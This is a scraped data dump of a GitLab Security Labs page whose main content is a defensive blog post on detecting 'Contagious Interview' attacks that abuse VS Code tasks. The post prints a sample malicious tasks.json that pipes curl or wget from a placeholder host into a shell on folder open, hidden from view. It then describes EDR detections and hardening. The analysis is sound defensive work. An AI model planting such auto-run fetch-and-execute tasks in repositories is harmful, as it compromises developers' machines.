[{"data":1,"prerenderedAt":809},["ShallowReactive",2],{"/en-us/blog/categories/security-labs":3,"navigation-en-us":21,"banner-en-us":442,"footer-en-us":452,"security-labs-category-page-total-items-en-us":694,"security-labs-category-page-featured-en-us":695,"security-labs-category-page-1-en-us":727},{"id":4,"title":5,"body":6,"category":6,"config":7,"content":12,"description":6,"extension":14,"meta":15,"navigation":9,"path":16,"seo":17,"slug":6,"stem":19,"testContent":6,"type":6,"__hash__":20},"blogCategories/en-us/blog/categories/security-labs.yml","Security Labs",null,{"template":8,"isCustomCategory":9,"slug":10,"hide":11},"BlogCategory",true,"security-labs",false,{"name":5,"description":13},"Learn about cybersecurity trends, best practices, and third-party threats to secure your code and digital infrastructure.","yml",{},"/en-us/blog/categories/security-labs",{"title":5,"description":18},"Browse articles related to Security Labs on the GitLab Blog","en-us/blog/categories/security-labs","R7W9jD38ydCqWBR5-wSYze-Orc17_eSeMP_60gUwCVg",{"logo":22,"freeTrial":27,"sales":32,"login":37,"items":42,"search":362,"minimal":393,"duo":412,"switchNav":421,"pricingDeployment":432},{"config":23},{"href":24,"dataGaName":25,"dataGaLocation":26},"/","gitlab logo","header",{"text":28,"config":29},"Get free trial",{"href":30,"dataGaName":31,"dataGaLocation":26},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":33,"config":34},"Talk to sales",{"href":35,"dataGaName":36,"dataGaLocation":26},"/sales/","sales",{"text":38,"config":39},"Sign in",{"href":40,"dataGaName":41,"dataGaLocation":26},"https://gitlab.com/users/sign_in/","sign in",[43,72,172,177,281,342],{"text":44,"config":45,"menu":47},"Platform",{"dataNavLevelOne":46},"platform",{"type":48,"columns":49},"cards",[50,56,64],{"title":44,"description":51,"link":52},"The intelligent orchestration platform for DevSecOps",{"text":53,"config":54},"Explore our Platform",{"href":55,"dataGaName":46,"dataGaLocation":26},"/platform/",{"title":57,"description":58,"link":59},"GitLab Duo Agent Platform","Agentic AI for the entire software lifecycle",{"text":60,"config":61},"Meet GitLab Duo",{"href":62,"dataGaName":63,"dataGaLocation":26},"/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":65,"description":66,"link":67},"Why GitLab","See the top reasons enterprises choose GitLab",{"text":68,"config":69},"Learn more",{"href":70,"dataGaName":71,"dataGaLocation":26},"/why-gitlab/","why gitlab",{"text":73,"left":9,"config":74,"menu":76},"Product",{"dataNavLevelOne":75},"solutions",{"type":77,"link":78,"columns":82,"feature":151},"lists",{"text":79,"config":80},"View all Solutions",{"href":81,"dataGaName":75,"dataGaLocation":26},"/solutions/",[83,107,130],{"title":84,"description":85,"link":86,"items":91},"Automation","CI/CD and automation to accelerate deployment",{"config":87},{"icon":88,"href":89,"dataGaName":90,"dataGaLocation":26},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[92,96,99,103],{"text":93,"config":94},"CI/CD",{"href":95,"dataGaLocation":26,"dataGaName":93},"/solutions/continuous-integration/",{"text":57,"config":97},{"href":62,"dataGaLocation":26,"dataGaName":98},"gitlab duo agent platform - product menu",{"text":100,"config":101},"Source Code Management",{"href":102,"dataGaLocation":26,"dataGaName":100},"/solutions/source-code-management/",{"text":104,"config":105},"Automated Software Delivery",{"href":89,"dataGaLocation":26,"dataGaName":106},"Automated software delivery",{"title":108,"description":109,"link":110,"items":115},"Security","Deliver code faster without compromising security",{"config":111},{"href":112,"dataGaName":113,"dataGaLocation":26,"icon":114},"/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[116,120,125],{"text":117,"config":118},"Application Security Testing",{"href":112,"dataGaName":119,"dataGaLocation":26},"Application security testing",{"text":121,"config":122},"Software Supply Chain Security",{"href":123,"dataGaLocation":26,"dataGaName":124},"/solutions/supply-chain/","Software supply chain security",{"text":126,"config":127},"Software Compliance",{"href":128,"dataGaName":129,"dataGaLocation":26},"/solutions/software-compliance/","software compliance",{"title":131,"link":132,"items":137},"Measurement",{"config":133},{"icon":134,"href":135,"dataGaName":136,"dataGaLocation":26},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[138,142,146],{"text":139,"config":140},"Visibility & Measurement",{"href":135,"dataGaLocation":26,"dataGaName":141},"Visibility and Measurement",{"text":143,"config":144},"Value Stream Management",{"href":145,"dataGaLocation":26,"dataGaName":143},"/solutions/value-stream-management/",{"text":147,"config":148},"Analytics & Insights",{"href":149,"dataGaLocation":26,"dataGaName":150},"/solutions/analytics-and-insights/","Analytics and insights",{"title":152,"type":77,"items":153},"GitLab for",[154,160,166],{"text":155,"config":156},"Enterprise",{"icon":157,"href":158,"dataGaLocation":26,"dataGaName":159},"Building","/enterprise/","enterprise",{"text":161,"config":162},"Small Business",{"icon":163,"href":164,"dataGaLocation":26,"dataGaName":165},"Work","/small-business/","small business",{"text":167,"config":168},"Public Sector",{"icon":169,"href":170,"dataGaLocation":26,"dataGaName":171},"Organization","/solutions/public-sector/","public sector",{"text":173,"config":174},"Pricing",{"href":175,"dataGaName":176,"dataGaLocation":26,"dataNavLevelOne":176},"/pricing/","pricing",{"text":178,"config":179,"menu":181},"Resources",{"dataNavLevelOne":180},"resources",{"type":77,"link":182,"columns":186,"feature":270},{"text":183,"config":184},"View all resources",{"href":185,"dataGaName":180,"dataGaLocation":26},"/resources/",[187,220,242],{"title":188,"items":189},"Getting started",[190,195,200,205,210,215],{"text":191,"config":192},"Install",{"href":193,"dataGaName":194,"dataGaLocation":26},"/install/","install",{"text":196,"config":197},"Quick start guides",{"href":198,"dataGaName":199,"dataGaLocation":26},"/get-started/","quick setup checklists",{"text":201,"config":202},"Learn",{"href":203,"dataGaLocation":26,"dataGaName":204},"https://university.gitlab.com/","learn",{"text":206,"config":207},"Product documentation",{"href":208,"dataGaName":209,"dataGaLocation":26},"https://docs.gitlab.com/","product documentation",{"text":211,"config":212},"Best practice videos",{"href":213,"dataGaName":214,"dataGaLocation":26},"/getting-started-videos/","best practice videos",{"text":216,"config":217},"Integrations",{"href":218,"dataGaName":219,"dataGaLocation":26},"/integrations/","integrations",{"title":221,"items":222},"Discover",[223,228,233,237],{"text":224,"config":225},"Customer success stories",{"href":226,"dataGaName":227,"dataGaLocation":26},"/customers/","customer success stories",{"text":229,"config":230},"Blog",{"href":231,"dataGaName":232,"dataGaLocation":26},"/blog/","blog",{"text":234,"config":235},"The Source",{"href":236,"dataGaName":232,"dataGaLocation":26},"/the-source/",{"text":238,"config":239},"Remote",{"href":240,"dataGaName":241,"dataGaLocation":26},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":243,"items":244},"Connect",[245,250,255,260,265],{"text":246,"config":247},"GitLab Services",{"href":248,"dataGaName":249,"dataGaLocation":26},"/services/","services",{"text":251,"config":252},"Community",{"href":253,"dataGaName":254,"dataGaLocation":26},"/community/","community",{"text":256,"config":257},"Forum",{"href":258,"dataGaName":259,"dataGaLocation":26},"https://forum.gitlab.com/","forum",{"text":261,"config":262},"Events",{"href":263,"dataGaName":264,"dataGaLocation":26},"/events/","events",{"text":266,"config":267},"Partners",{"href":268,"dataGaName":269,"dataGaLocation":26},"/partners/","partners",{"config":271,"title":274,"text":275,"link":276},{"background":272,"textColor":273},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","What’s new in GitLab","Stay updated with our latest features and improvements.",{"text":277,"config":278},"Read the latest",{"href":279,"dataGaName":280,"dataGaLocation":26},"/releases/whats-new/","whats new",{"text":282,"config":283,"menu":285},"Company",{"dataNavLevelOne":284},"company",{"type":77,"columns":286},[287],{"items":288},[289,294,300,302,307,312,317,322,327,332,337],{"text":290,"config":291},"About",{"href":292,"dataGaName":293,"dataGaLocation":26},"/company/","about",{"text":295,"config":296,"footerGa":299},"Jobs",{"href":297,"dataGaName":298,"dataGaLocation":26},"/jobs/","jobs",{"dataGaName":298},{"text":261,"config":301},{"href":263,"dataGaName":264,"dataGaLocation":26},{"text":303,"config":304},"Leadership",{"href":305,"dataGaName":306,"dataGaLocation":26},"/company/team/e-group/","leadership",{"text":308,"config":309},"Team",{"href":310,"dataGaName":311,"dataGaLocation":26},"/company/team/","team",{"text":313,"config":314},"Handbook",{"href":315,"dataGaName":316,"dataGaLocation":26},"https://handbook.gitlab.com/","handbook",{"text":318,"config":319},"Investor relations",{"href":320,"dataGaName":321,"dataGaLocation":26},"https://ir.gitlab.com/","investor relations",{"text":323,"config":324},"Trust Center",{"href":325,"dataGaName":326,"dataGaLocation":26},"/security/","trust center",{"text":328,"config":329},"AI Transparency Center",{"href":330,"dataGaName":331,"dataGaLocation":26},"/ai-transparency-center/","ai transparency center",{"text":333,"config":334},"Newsletter",{"href":335,"dataGaName":336,"dataGaLocation":26},"/company/contact/#contact-forms","newsletter",{"text":338,"config":339},"Press",{"href":340,"dataGaName":341,"dataGaLocation":26},"/press/","press",{"text":343,"config":344,"menu":345},"Contact us",{"dataNavLevelOne":284},{"type":77,"columns":346},[347],{"items":348},[349,352,357],{"text":33,"config":350},{"href":35,"dataGaName":351,"dataGaLocation":26},"talk to sales",{"text":353,"config":354},"Support portal",{"href":355,"dataGaName":356,"dataGaLocation":26},"https://support.gitlab.com","support portal",{"text":358,"config":359},"Customer portal",{"href":360,"dataGaName":361,"dataGaLocation":26},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":363,"login":364,"suggestions":371},"Close",{"text":365,"link":366},"To search repositories and projects, login to",{"text":367,"config":368},"gitlab.com",{"href":40,"dataGaName":369,"dataGaLocation":370},"search login","search",{"text":372,"default":373},"Suggestions",[374,376,380,382,386,390],{"text":57,"config":375},{"href":62,"dataGaName":57,"dataGaLocation":370},{"text":377,"config":378},"Code Suggestions (AI)",{"href":379,"dataGaName":377,"dataGaLocation":370},"/solutions/code-suggestions/",{"text":93,"config":381},{"href":95,"dataGaName":93,"dataGaLocation":370},{"text":383,"config":384},"GitLab on AWS",{"href":385,"dataGaName":383,"dataGaLocation":370},"/partners/technology-partners/aws/",{"text":387,"config":388},"GitLab on Google Cloud",{"href":389,"dataGaName":387,"dataGaLocation":370},"/partners/technology-partners/google-cloud-platform/",{"text":391,"config":392},"Why GitLab?",{"href":70,"dataGaName":391,"dataGaLocation":370},{"freeTrial":394,"mobileIcon":399,"desktopIcon":404,"secondaryButton":407},{"text":395,"config":396},"Start free trial",{"href":397,"dataGaName":31,"dataGaLocation":398},"https://gitlab.com/-/trials/new/","nav",{"altText":400,"config":401},"Gitlab Icon",{"src":402,"dataGaName":403,"dataGaLocation":398},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":400,"config":405},{"src":406,"dataGaName":403,"dataGaLocation":398},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":408,"config":409},"Get Started",{"href":410,"dataGaName":411,"dataGaLocation":398},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/get-started/","get started",{"freeTrial":413,"mobileIcon":417,"desktopIcon":419},{"text":414,"config":415},"Learn more about GitLab Duo",{"href":62,"dataGaName":416,"dataGaLocation":398},"gitlab duo",{"altText":400,"config":418},{"src":402,"dataGaName":403,"dataGaLocation":398},{"altText":400,"config":420},{"src":406,"dataGaName":403,"dataGaLocation":398},{"button":422,"mobileIcon":427,"desktopIcon":429},{"text":423,"config":424},"/switch",{"href":425,"dataGaName":426,"dataGaLocation":398},"#contact","switch",{"altText":400,"config":428},{"src":402,"dataGaName":403,"dataGaLocation":398},{"altText":400,"config":430},{"src":431,"dataGaName":403,"dataGaLocation":398},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":433,"mobileIcon":438,"desktopIcon":440},{"text":434,"config":435},"Back to pricing",{"href":175,"dataGaName":436,"dataGaLocation":398,"icon":437},"back to pricing","GoBack",{"altText":400,"config":439},{"src":402,"dataGaName":403,"dataGaLocation":398},{"altText":400,"config":441},{"src":406,"dataGaName":403,"dataGaLocation":398},{"title":443,"button":444,"config":449},"See how agentic AI transforms software delivery",{"text":445,"config":446},"Sign up for GitLab Transcend on June 10",{"href":447,"dataGaName":448,"dataGaLocation":26},"/releases/whats-new/#sign-up","transcend event",{"layout":450,"icon":451,"disabled":11},"release","AiStar",{"data":453},{"text":454,"source":455,"edit":461,"contribute":466,"config":471,"items":476,"minimal":683},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":456,"config":457},"View page source",{"href":458,"dataGaName":459,"dataGaLocation":460},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":462,"config":463},"Edit this page",{"href":464,"dataGaName":465,"dataGaLocation":460},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":467,"config":468},"Please contribute",{"href":469,"dataGaName":470,"dataGaLocation":460},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":472,"facebook":473,"youtube":474,"linkedin":475},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[477,524,578,622,649],{"title":173,"links":478,"subMenu":493},[479,483,488],{"text":480,"config":481},"View plans",{"href":175,"dataGaName":482,"dataGaLocation":460},"view plans",{"text":484,"config":485},"Why Premium?",{"href":486,"dataGaName":487,"dataGaLocation":460},"/pricing/premium/","why premium",{"text":489,"config":490},"Why Ultimate?",{"href":491,"dataGaName":492,"dataGaLocation":460},"/pricing/ultimate/","why ultimate",[494],{"title":495,"links":496},"Contact Us",[497,500,502,504,509,514,519],{"text":498,"config":499},"Contact sales",{"href":35,"dataGaName":36,"dataGaLocation":460},{"text":353,"config":501},{"href":355,"dataGaName":356,"dataGaLocation":460},{"text":358,"config":503},{"href":360,"dataGaName":361,"dataGaLocation":460},{"text":505,"config":506},"Status",{"href":507,"dataGaName":508,"dataGaLocation":460},"https://status.gitlab.com/","status",{"text":510,"config":511},"Terms of use",{"href":512,"dataGaName":513,"dataGaLocation":460},"/terms/","terms of use",{"text":515,"config":516},"Privacy statement",{"href":517,"dataGaName":518,"dataGaLocation":460},"/privacy/","privacy statement",{"text":520,"config":521},"Cookie preferences",{"dataGaName":522,"dataGaLocation":460,"id":523,"isOneTrustButton":9},"cookie preferences","ot-sdk-btn",{"title":73,"links":525,"subMenu":534},[526,530],{"text":527,"config":528},"DevSecOps platform",{"href":55,"dataGaName":529,"dataGaLocation":460},"devsecops platform",{"text":531,"config":532},"AI-Assisted Development",{"href":62,"dataGaName":533,"dataGaLocation":460},"ai-assisted development",[535],{"title":536,"links":537},"Topics",[538,543,548,553,558,563,568,573],{"text":539,"config":540},"CICD",{"href":541,"dataGaName":542,"dataGaLocation":460},"/topics/ci-cd/","cicd",{"text":544,"config":545},"GitOps",{"href":546,"dataGaName":547,"dataGaLocation":460},"/topics/gitops/","gitops",{"text":549,"config":550},"DevOps",{"href":551,"dataGaName":552,"dataGaLocation":460},"/topics/devops/","devops",{"text":554,"config":555},"Version Control",{"href":556,"dataGaName":557,"dataGaLocation":460},"/topics/version-control/","version control",{"text":559,"config":560},"DevSecOps",{"href":561,"dataGaName":562,"dataGaLocation":460},"/topics/devsecops/","devsecops",{"text":564,"config":565},"Cloud Native",{"href":566,"dataGaName":567,"dataGaLocation":460},"/topics/cloud-native/","cloud native",{"text":569,"config":570},"AI for Coding",{"href":571,"dataGaName":572,"dataGaLocation":460},"/topics/devops/ai-for-coding/","ai for coding",{"text":574,"config":575},"Agentic AI",{"href":576,"dataGaName":577,"dataGaLocation":460},"/topics/agentic-ai/","agentic ai",{"title":579,"links":580},"Solutions",[581,583,585,590,594,597,601,604,606,609,612,617],{"text":117,"config":582},{"href":112,"dataGaName":117,"dataGaLocation":460},{"text":106,"config":584},{"href":89,"dataGaName":90,"dataGaLocation":460},{"text":586,"config":587},"Agile development",{"href":588,"dataGaName":589,"dataGaLocation":460},"/solutions/agile-delivery/","agile delivery",{"text":591,"config":592},"SCM",{"href":102,"dataGaName":593,"dataGaLocation":460},"source code management",{"text":539,"config":595},{"href":95,"dataGaName":596,"dataGaLocation":460},"continuous integration & delivery",{"text":598,"config":599},"Value stream management",{"href":145,"dataGaName":600,"dataGaLocation":460},"value stream management",{"text":544,"config":602},{"href":603,"dataGaName":547,"dataGaLocation":460},"/solutions/gitops/",{"text":155,"config":605},{"href":158,"dataGaName":159,"dataGaLocation":460},{"text":607,"config":608},"Small business",{"href":164,"dataGaName":165,"dataGaLocation":460},{"text":610,"config":611},"Public sector",{"href":170,"dataGaName":171,"dataGaLocation":460},{"text":613,"config":614},"Education",{"href":615,"dataGaName":616,"dataGaLocation":460},"/solutions/education/","education",{"text":618,"config":619},"Financial services",{"href":620,"dataGaName":621,"dataGaLocation":460},"/solutions/finance/","financial services",{"title":178,"links":623},[624,626,628,630,633,635,637,639,641,643,645,647],{"text":191,"config":625},{"href":193,"dataGaName":194,"dataGaLocation":460},{"text":196,"config":627},{"href":198,"dataGaName":199,"dataGaLocation":460},{"text":201,"config":629},{"href":203,"dataGaName":204,"dataGaLocation":460},{"text":206,"config":631},{"href":208,"dataGaName":632,"dataGaLocation":460},"docs",{"text":229,"config":634},{"href":231,"dataGaName":232,"dataGaLocation":460},{"text":224,"config":636},{"href":226,"dataGaName":227,"dataGaLocation":460},{"text":238,"config":638},{"href":240,"dataGaName":241,"dataGaLocation":460},{"text":246,"config":640},{"href":248,"dataGaName":249,"dataGaLocation":460},{"text":251,"config":642},{"href":253,"dataGaName":254,"dataGaLocation":460},{"text":256,"config":644},{"href":258,"dataGaName":259,"dataGaLocation":460},{"text":261,"config":646},{"href":263,"dataGaName":264,"dataGaLocation":460},{"text":266,"config":648},{"href":268,"dataGaName":269,"dataGaLocation":460},{"title":282,"links":650},[651,653,655,657,659,661,663,667,672,674,676,678],{"text":290,"config":652},{"href":292,"dataGaName":284,"dataGaLocation":460},{"text":295,"config":654},{"href":297,"dataGaName":298,"dataGaLocation":460},{"text":303,"config":656},{"href":305,"dataGaName":306,"dataGaLocation":460},{"text":308,"config":658},{"href":310,"dataGaName":311,"dataGaLocation":460},{"text":313,"config":660},{"href":315,"dataGaName":316,"dataGaLocation":460},{"text":318,"config":662},{"href":320,"dataGaName":321,"dataGaLocation":460},{"text":664,"config":665},"Sustainability",{"href":666,"dataGaName":664,"dataGaLocation":460},"/sustainability/",{"text":668,"config":669},"Diversity, inclusion and belonging (DIB)",{"href":670,"dataGaName":671,"dataGaLocation":460},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":323,"config":673},{"href":325,"dataGaName":326,"dataGaLocation":460},{"text":333,"config":675},{"href":335,"dataGaName":336,"dataGaLocation":460},{"text":338,"config":677},{"href":340,"dataGaName":341,"dataGaLocation":460},{"text":679,"config":680},"Modern Slavery Transparency Statement",{"href":681,"dataGaName":682,"dataGaLocation":460},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":684},[685,688,691],{"text":686,"config":687},"Terms",{"href":512,"dataGaName":513,"dataGaLocation":460},{"text":689,"config":690},"Cookies",{"dataGaName":522,"dataGaLocation":460,"id":523,"isOneTrustButton":9},{"text":692,"config":693},"Privacy",{"href":517,"dataGaName":518,"dataGaLocation":460},16,{"id":696,"title":697,"authorSlugs":698,"authors":700,"body":702,"category":10,"categorySlug":10,"config":703,"content":706,"date":710,"description":707,"extension":14,"externalUrl":6,"featured":11,"heroImage":709,"isFeatured":11,"meta":716,"navigation":9,"path":717,"publishedDate":710,"rawbody":718,"seo":719,"slug":705,"stem":722,"tagSlugs":723,"tags":725,"template":704,"updatedDate":6,"__hash__":726},"blogPosts/en-us/blog/how-to-detect-and-prevent-contagious-interview-ide-attacks.yml","How to detect and prevent Contagious Interview IDE attacks",[699],"josh-feehs",[701],"Josh Feehs","Recently, GitLab's Threat Intelligence team, part of the Security Operations team, published an [extensive article](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/) revealing North Korean tradecraft and detailing ways in which GitLab has tracked and disrupted these malicious actors. Security Operations here also includes our Security Incident Response Team (SIRT), Security Logging, Signals Intelligence, and Red Team. This tight collaboration across security disciplines allows us to take tips from threat intelligence, emulate relevant threat actors via Red and Purple Team exercises, and proactively build detection and prevention techniques based on that activity.\n\nSo, in parallel with the discovery of the North Korean tradecraft and associated [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.\n\n## The threat intelligence\n\nThe North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of [the attack paths noted](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#_2025-campaign-trends) was the use of Visual Studio Code tasks for malware distribution. The [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.\n\n[VS Code tasks](https://code.visualstudio.com/docs/debugtest/tasks) are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, `tasks.json`, developers can automatically run code whenever they open their repository. Trust must be granted to the repository for these tasks to run.\n\nContagious Interview’s pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.\n\nOne example of a malicious `tasks.json` file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a `curl | bash` structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our [previous blog post](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#appendix-2-indicators-of-compromise).\n\n\n```json\n  \"version\": \"1.0.8\",\n  \"tasks\": [\n    {\n      \"label\": \"env\",\n      \"type\": \"shell\",\n      \"osx\": {\n        \"command\": \"curl 'https://www.example[.]com/settings/mac?flag=8' | bash\"\n      },\n      \"linux\": {\n        \"command\": \"wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | sh\"\n      },\n      \"windows\": {\n        \"command\": \"curl https://www.example[.]com/settings/windows?flag=8 | cmd\"\n      },\n      \"problemMatcher\": [],\n      \"presentation\": {\n        \"reveal\": \"never\",\n        \"echo\": false,\n        \"focus\": false,\n        \"close\": true,\n        \"panel\": \"dedicated\",\n        \"showReuseMessage\": false\n      },\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"\n      }\n    }\n  ]\n```\n\nThis malicious code execution is then typically used to deploy infostealers, steal passwords and cryptocurrency, and ultimately establish persistence to abuse victims’ trusted accesses to corporate networks.\n\nOnce we understood how the threat actor was gaining initial code execution, we had a target for preventative measures to catch these attacks before GitLab workstations were targeted.\n\n## Multi-faceted detection and prevention\n\nWe always want to develop detective and preventative controls that are as “low level” as possible, since these types of detections are typically more difficult to bypass. Additionally, threat intelligence indicated that other projects that forked VS Code are also vulnerable to this malicious repository attack. So, instead of focusing specifically on a VS Code detection, we wanted to find the area “closest to the operating system” where this malicious code execution could be identified. This would allow our detection techniques to detect not only exploitation via VS Code tasks, but also attacks targeting using a VS Code fork or similar IDE written in Node that has background tasks.  \n   \nReviewing VS Code source, we identified that the `node-pty.spawn()` library call is used across the product when subprocesses need to be used. The [node-pty library](https://www.npmjs.com/package/node-pty) is incredibly popular, with over a million weekly downloads at time of writing. This library enables Node applications (including Electron applications such as VS Code) to fork subprocesses from a node context, and results in calls to its own binary, `spawn-helper`. When subprocesses are launched, `spawn-helper` is spawned as a child process of the Node application calling it.\n\nAfter performing a Purple Team operation to emulate this specific attack path, we reviewed our Endpoint Detection and Response (EDR) telemetry to try to not only develop a strong detection for the emulated attack, but also to tune this detection to only alert on suspicious activity, and not on legitimate developer activity. We identified that `spawn-helper` is called in situations where VS Code wants to spawn tasks that occur in the *background*, without user visibility or interaction. Conversely, a `Code Helper` binary is called when new processes (such as the integrated Terminal) are launched in the *foreground* with user interaction.\n\nThis allows us to craft detections that only look for subprocesses spawned without the user’s knowledge, and avoid false positives that flag subprocesses a user might intentionally spawn while using their IDE.\n\nAs shown earlier, a commonly-seen malicious task contains commands that run a `curl | \u003Cshell>` from a task. Although `curl | bash` can be a legitimate way to install software like Homebrew, in our environment, it should never happen in the background without the user’s knowledge. This distinction allowed us to tune `spawn-helper`\\-based detections to not alert on *every* background task that ran, but to instead trigger only on behaviors that are uncommon and suspicious in our environment. Since implementing this detection technique, we have had no false positives, even though a large part of our organization uses VS Code daily.\n\nAlthough this article has focused on detecting `spawn-helper` in your environment, this is only one of many layers of defense that you can implement in your organization to prevent and detect these IDE task-based attacks.\n\nIn addition to using EDR instrumentation to detect a malicious task at runtime, you can proactively harden your fleet against this type of attack by pushing global configs to disable task runs in VS Code. If that is too disruptive to your developers, you can also scan your environment to enumerate how often users use trusted workspaces and trusted workspace folders within their typical VS Code usage, and run education campaigns to help inform the company about the risks posed by this Contagious Interview attack path.\n\n## Summary\n\nGitLab Security Operations works around the clock to protect our customers and our company. With our tightly coupled security teams, we are able to produce actionable threat intelligence, leverage that threat intel to inform adversary emulation operations, and ultimately develop technical and procedural prevention and detection techniques that protect our customers and company.\n\nAs VS Code tasks continue to receive visibility in the security community, it’s possible that other threat actors will attempt to use this attack path for their own ends. We hope that this small example of the work we do to protect GitLab and our customers against Advanced Persistent Threats can inspire others to do the same, and to join us in our continued mission to disrupt these threat actors. \n\n> Follow our innovation and research on our [Security Labs site](https://about.gitlab.com/blog/categories/security-labs/).",{"featured":11,"template":704,"slug":705},"BlogPost","how-to-detect-and-prevent-contagious-interview-ide-attacks",{"title":697,"description":707,"authors":708,"heroImage":709,"date":710,"body":702,"category":10,"tags":711},"Learn how we built custom controls that detect and prevent malware campaigns like those used for Contagious Interview and how to deploy them in your environment.",[701],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png","2026-05-04",[712,713,714,715],"security","security research","product","tutorial",{},"/en-us/blog/how-to-detect-and-prevent-contagious-interview-ide-attacks","seo:\n  config:\n    noIndex: false\n  title: How to detect and prevent Contagious Interview IDE attacks\n  description: Learn how we built custom controls that detect and prevent malware\n    campaigns like those used for Contagious Interview.\ncontent:\n  title: How to detect and prevent Contagious Interview IDE attacks\n  description: Learn how we built custom controls that detect and prevent malware\n    campaigns like those used for Contagious Interview and how to deploy them in\n    your environment.\n  authors:\n    - Josh Feehs\n  heroImage: https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png\n  date: 2026-05-04\n  body: >-\n    Recently, GitLab's Threat Intelligence team, part of the Security Operations\n    team, published an [extensive\n    article](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/)\n    revealing North Korean tradecraft and detailing ways in which GitLab has\n    tracked and disrupted these malicious actors. Security Operations here also\n    includes our Security Incident Response Team (SIRT), Security Logging,\n    Signals Intelligence, and Red Team. This tight collaboration across security\n    disciplines allows us to take tips from threat intelligence, emulate\n    relevant threat actors via Red and Purple Team exercises, and proactively\n    build detection and prevention techniques based on that activity.\n\n\n    So, in parallel with the discovery of the North Korean tradecraft and associated [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.\n\n\n    ## The threat intelligence\n\n\n    The North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of [the attack paths noted](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#_2025-campaign-trends) was the use of Visual Studio Code tasks for malware distribution. The [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.\n\n\n    [VS Code tasks](https://code.visualstudio.com/docs/debugtest/tasks) are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, `tasks.json`, developers can automatically run code whenever they open their repository. Trust must be granted to the repository for these tasks to run.\n\n\n    Contagious Interview’s pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.\n\n\n    One example of a malicious `tasks.json` file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a `curl | bash` structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our [previous blog post](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#appendix-2-indicators-of-compromise).\n\n\n\n    ```json\n      \"version\": \"1.0.8\",\n      \"tasks\": [\n        {\n          \"label\": \"env\",\n          \"type\": \"shell\",\n          \"osx\": {\n            \"command\": \"curl 'https://www.example[.]com/settings/mac?flag=8' | bash\"\n          },\n          \"linux\": {\n            \"command\": \"wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | sh\"\n          },\n          \"windows\": {\n            \"command\": \"curl 